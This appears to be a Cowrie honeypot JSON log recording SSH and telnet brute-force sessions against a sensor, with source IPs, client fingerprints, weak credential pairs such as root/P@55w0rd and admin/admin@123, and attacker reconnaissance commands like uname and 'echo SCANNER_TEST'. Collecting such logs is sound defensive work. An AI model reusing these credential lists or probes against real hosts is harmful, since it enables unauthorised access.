{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-08-28T01:16:05.719277Z","src_ip":"212.227.235.229","session":"77e28bdbad70"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-08-28T01:16:06.260747Z","src_ip":"212.227.235.229","session":"77e28bdbad70"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-08-28T01:16:06.397033Z","session":"77e28bdbad70"}
{"eventid":"cowrie.session.connect","src_ip":"194.233.79.134","src_port":59406,"dst_ip":"1.2.3.4","dst_port":22,"session":"e8874957801c","protocol":"ssh","message":"New connection: 194.233.79.134:59406 (1.2.3.4:22) [session: e8874957801c]","sensor":"my-vps","timestamp":"2025-08-28T01:16:57.376425Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T01:16:57.964501Z","src_ip":"194.233.79.134","session":"e8874957801c"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T01:16:57.965145Z","src_ip":"194.233.79.134","session":"e8874957801c"}
{"eventid":"cowrie.login.success","username":"root","password":"P@55w0rd","message":"login attempt [root/P@55w0rd] succeeded","sensor":"my-vps","timestamp":"2025-08-28T01:16:59.474162Z","src_ip":"194.233.79.134","session":"e8874957801c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T01:17:00.029247Z","src_ip":"194.233.79.134","session":"e8874957801c"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T01:17:00.030120Z","src_ip":"194.233.79.134","session":"e8874957801c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.5","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:17:00.535506Z","src_ip":"194.233.79.134","session":"e8874957801c"}
{"eventid":"cowrie.session.closed","duration":"3.2","message":"Connection lost after 3.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:17:00.536695Z","src_ip":"194.233.79.134","session":"e8874957801c"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:17:15.585804Z","src_ip":"212.227.235.229","session":"77e28bdbad70"}
{"eventid":"cowrie.session.connect","src_ip":"194.233.79.134","src_port":45578,"dst_ip":"1.2.3.4","dst_port":22,"session":"bc15b274d2df","protocol":"ssh","message":"New connection: 194.233.79.134:45578 (1.2.3.4:22) [session: bc15b274d2df]","sensor":"my-vps","timestamp":"2025-08-28T01:18:32.182130Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T01:18:32.948815Z","src_ip":"194.233.79.134","session":"bc15b274d2df"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T01:18:32.949769Z","src_ip":"194.233.79.134","session":"bc15b274d2df"}
{"eventid":"cowrie.login.success","username":"root","password":"1234567890","message":"login attempt [root/1234567890] succeeded","sensor":"my-vps","timestamp":"2025-08-28T01:18:37.021663Z","src_ip":"194.233.79.134","session":"bc15b274d2df"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T01:18:39.409816Z","src_ip":"194.233.79.134","session":"bc15b274d2df"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T01:18:39.410501Z","src_ip":"194.233.79.134","session":"bc15b274d2df"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.8","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:18:40.197819Z","src_ip":"194.233.79.134","session":"bc15b274d2df"}
{"eventid":"cowrie.session.closed","duration":"8.0","message":"Connection lost after 8.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:18:40.198893Z","src_ip":"194.233.79.134","session":"bc15b274d2df"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":51640,"dst_ip":"1.2.3.4","dst_port":23,"session":"caa4175b25a1","protocol":"telnet","message":"New connection: 212.227.125.160:51640 (1.2.3.4:23) [session: caa4175b25a1]","sensor":"my-vps","timestamp":"2025-08-28T01:19:08.170377Z"}
{"eventid":"cowrie.login.failed","username":"root","password":"root","message":"login attempt [root/root] failed","sensor":"my-vps","timestamp":"2025-08-28T01:19:08.296321Z","src_ip":"212.227.125.160","session":"caa4175b25a1"}
{"eventid":"cowrie.login.failed","username":"","password":"","message":"login attempt [/] failed","sensor":"my-vps","timestamp":"2025-08-28T01:19:09.450267Z","src_ip":"212.227.125.160","session":"caa4175b25a1"}
{"eventid":"cowrie.session.closed","duration":2.469993829727173,"message":"Connection lost after 2 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:19:10.640301Z","src_ip":"212.227.125.160","session":"caa4175b25a1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":51652,"dst_ip":"1.2.3.4","dst_port":23,"session":"606769f66f76","protocol":"telnet","message":"New connection: 212.227.125.160:51652 (1.2.3.4:23) [session: 606769f66f76]","sensor":"my-vps","timestamp":"2025-08-28T01:19:10.680008Z"}
{"eventid":"cowrie.login.success","username":"root","password":"","message":"login attempt [root/] succeeded","sensor":"my-vps","timestamp":"2025-08-28T01:19:10.869895Z","src_ip":"212.227.125.160","session":"606769f66f76"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T01:19:10.953820Z","src_ip":"212.227.125.160","session":"606769f66f76"}
{"eventid":"cowrie.command.input","input":"echo SCANNER_TEST","message":"CMD: echo SCANNER_TEST","sensor":"my-vps","timestamp":"2025-08-28T01:19:11.022437Z","src_ip":"212.227.125.160","session":"606769f66f76"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c","size":492,"shasum":"f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c","duplicate":true,"duration":"1.1","message":"Closing TTY Log: var/lib/cowrie/tty/f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:19:12.031941Z","src_ip":"212.227.125.160","session":"606769f66f76"}
{"eventid":"cowrie.session.closed","duration":1.3573212623596191,"message":"Connection lost after 1 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:19:12.037254Z","src_ip":"212.227.125.160","session":"606769f66f76"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":62143,"dst_ip":"1.2.3.4","dst_port":22,"session":"d5c05168d355","protocol":"ssh","message":"New connection: 212.227.125.160:62143 (1.2.3.4:22) [session: d5c05168d355]","sensor":"my-vps","timestamp":"2025-08-28T01:19:37.718390Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T01:19:37.719430Z","src_ip":"212.227.125.160","session":"d5c05168d355"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T01:19:37.823497Z","src_ip":"212.227.125.160","session":"d5c05168d355"}
{"eventid":"cowrie.login.failed","username":"user","password":"Exigent","message":"login attempt [user/Exigent] failed","sensor":"my-vps","timestamp":"2025-08-28T01:19:38.336272Z","src_ip":"212.227.125.160","session":"d5c05168d355"}
{"eventid":"cowrie.login.failed","username":"user","password":"clancy","message":"login attempt [user/clancy] failed","sensor":"my-vps","timestamp":"2025-08-28T01:19:39.433136Z","src_ip":"212.227.125.160","session":"d5c05168d355"}
{"eventid":"cowrie.login.failed","username":"user","password":"chelsea1","message":"login attempt [user/chelsea1] failed","sensor":"my-vps","timestamp":"2025-08-28T01:19:40.522093Z","src_ip":"212.227.125.160","session":"d5c05168d355"}
{"eventid":"cowrie.login.failed","username":"user","password":"353535","message":"login attempt [user/353535] failed","sensor":"my-vps","timestamp":"2025-08-28T01:19:41.635710Z","src_ip":"212.227.125.160","session":"d5c05168d355"}
{"eventid":"cowrie.login.failed","username":"user","password":"282828","message":"login attempt [user/282828] failed","sensor":"my-vps","timestamp":"2025-08-28T01:19:42.748494Z","src_ip":"212.227.125.160","session":"d5c05168d355"}
{"eventid":"cowrie.session.closed","duration":"6.1","message":"Connection lost after 6.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:19:43.837436Z","src_ip":"212.227.125.160","session":"d5c05168d355"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47886,"dst_ip":"1.2.3.4","dst_port":23,"session":"ddf7bb83a893","protocol":"telnet","message":"New connection: 212.227.125.160:47886 (1.2.3.4:23) [session: ddf7bb83a893]","sensor":"my-vps","timestamp":"2025-08-28T01:19:58.453941Z"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":55082,"dst_ip":"1.2.3.4","dst_port":22,"session":"0612188f8357","protocol":"ssh","message":"New connection: 217.72.205.35:55082 (1.2.3.4:22) [session: 0612188f8357]","sensor":"my-vps","timestamp":"2025-08-28T01:20:00.516586Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:20:00.517907Z","src_ip":"217.72.205.35","session":"0612188f8357"}
{"eventid":"cowrie.session.connect","src_ip":"31.59.58.163","src_port":43234,"dst_ip":"1.2.3.4","dst_port":23,"session":"0bb7d85726a4","protocol":"telnet","message":"New connection: 31.59.58.163:43234 (1.2.3.4:23) [session: 0bb7d85726a4]","sensor":"my-vps","timestamp":"2025-08-28T01:20:08.486598Z"}
{"eventid":"cowrie.session.closed","duration":17.80309772491455,"message":"Connection lost after 17 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:20:16.256941Z","src_ip":"212.227.125.160","session":"ddf7bb83a893"}
{"eventid":"cowrie.session.connect","src_ip":"194.233.79.134","src_port":58176,"dst_ip":"1.2.3.4","dst_port":22,"session":"757e730bb2ac","protocol":"ssh","message":"New connection: 194.233.79.134:58176 (1.2.3.4:22) [session: 757e730bb2ac]","sensor":"my-vps","timestamp":"2025-08-28T01:20:19.660934Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T01:20:19.781111Z","src_ip":"194.233.79.134","session":"757e730bb2ac"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T01:20:19.970705Z","src_ip":"194.233.79.134","session":"757e730bb2ac"}
{"eventid":"cowrie.login.failed","username":"zabbix","password":"zabbix","message":"login attempt [zabbix/zabbix] failed","sensor":"my-vps","timestamp":"2025-08-28T01:20:21.901287Z","src_ip":"194.233.79.134","session":"757e730bb2ac"}
{"eventid":"cowrie.session.closed","duration":"3.4","message":"Connection lost after 3.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:20:23.088786Z","src_ip":"194.233.79.134","session":"757e730bb2ac"}
{"eventid":"cowrie.session.closed","duration":29.59427046775818,"message":"Connection lost after 29 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:20:38.080775Z","src_ip":"31.59.58.163","session":"0bb7d85726a4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41118,"dst_ip":"1.2.3.4","dst_port":22,"session":"a790fc59e605","protocol":"ssh","message":"New connection: 212.227.235.229:41118 (1.2.3.4:22) [session: a790fc59e605]","sensor":"my-vps","timestamp":"2025-08-28T01:21:01.418123Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T01:21:01.419637Z","src_ip":"212.227.235.229","session":"a790fc59e605"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-28T01:21:01.523757Z","src_ip":"212.227.235.229","session":"a790fc59e605"}
{"eventid":"cowrie.login.failed","username":"admin","password":"admin@123","message":"login attempt [admin/admin@123] failed","sensor":"my-vps","timestamp":"2025-08-28T01:21:01.944441Z","src_ip":"212.227.235.229","session":"a790fc59e605"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:21:03.051179Z","src_ip":"212.227.235.229","session":"a790fc59e605"}
{"eventid":"cowrie.session.connect","src_ip":"218.1.218.143","src_port":52668,"dst_ip":"1.2.3.4","dst_port":23,"session":"8b1ce6498333","protocol":"telnet","message":"New connection: 218.1.218.143:52668 (1.2.3.4:23) [session: 8b1ce6498333]","sensor":"my-vps","timestamp":"2025-08-28T01:21:28.022439Z"}
{"eventid":"cowrie.session.connect","src_ip":"218.1.218.143","src_port":52680,"dst_ip":"1.2.3.4","dst_port":23,"session":"128818559c1f","protocol":"telnet","message":"New connection: 218.1.218.143:52680 (1.2.3.4:23) [session: 128818559c1f]","sensor":"my-vps","timestamp":"2025-08-28T01:21:30.112623Z"}
{"eventid":"cowrie.session.connect","src_ip":"218.1.218.143","src_port":52686,"dst_ip":"1.2.3.4","dst_port":23,"session":"aeca61f393e5","protocol":"telnet","message":"New connection: 218.1.218.143:52686 (1.2.3.4:23) [session: aeca61f393e5]","sensor":"my-vps","timestamp":"2025-08-28T01:21:31.290826Z"}
{"eventid":"cowrie.session.connect","src_ip":"218.1.218.143","src_port":52711,"dst_ip":"1.2.3.4","dst_port":23,"session":"0c3d935b1b7c","protocol":"telnet","message":"New connection: 218.1.218.143:52711 (1.2.3.4:23) [session: 0c3d935b1b7c]","sensor":"my-vps","timestamp":"2025-08-28T01:21:35.049516Z"}
{"eventid":"cowrie.session.connect","src_ip":"218.1.218.143","src_port":52769,"dst_ip":"1.2.3.4","dst_port":23,"session":"875a80296a45","protocol":"telnet","message":"New connection: 218.1.218.143:52769 (1.2.3.4:23) [session: 875a80296a45]","sensor":"my-vps","timestamp":"2025-08-28T01:21:43.434530Z"}
{"eventid":"cowrie.session.connect","src_ip":"194.233.79.134","src_port":45994,"dst_ip":"1.2.3.4","dst_port":22,"session":"7b62703a3107","protocol":"ssh","message":"New connection: 194.233.79.134:45994 (1.2.3.4:22) [session: 7b62703a3107]","sensor":"my-vps","timestamp":"2025-08-28T01:21:57.649428Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T01:21:57.652121Z","src_ip":"194.233.79.134","session":"7b62703a3107"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T01:21:58.001034Z","src_ip":"194.233.79.134","session":"7b62703a3107"}
{"eventid":"cowrie.login.failed","username":"kubernetes","password":"kubernetes","message":"login attempt [kubernetes/kubernetes] failed","sensor":"my-vps","timestamp":"2025-08-28T01:22:00.106991Z","src_ip":"194.233.79.134","session":"7b62703a3107"}
{"eventid":"cowrie.session.closed","duration":"5.2","message":"Connection lost after 5.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:22:02.848203Z","src_ip":"194.233.79.134","session":"7b62703a3107"}
{"eventid":"cowrie.session.closed","duration":43.26931095123291,"message":"Connection lost after 43 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:22:11.290831Z","src_ip":"218.1.218.143","session":"8b1ce6498333"}
{"eventid":"cowrie.session.closed","duration":40.83686327934265,"message":"Connection lost after 40 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:22:15.886305Z","src_ip":"218.1.218.143","session":"0c3d935b1b7c"}
{"eventid":"cowrie.session.closed","duration":43.079920053482056,"message":"Connection lost after 43 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:22:26.514380Z","src_ip":"218.1.218.143","session":"875a80296a45"}
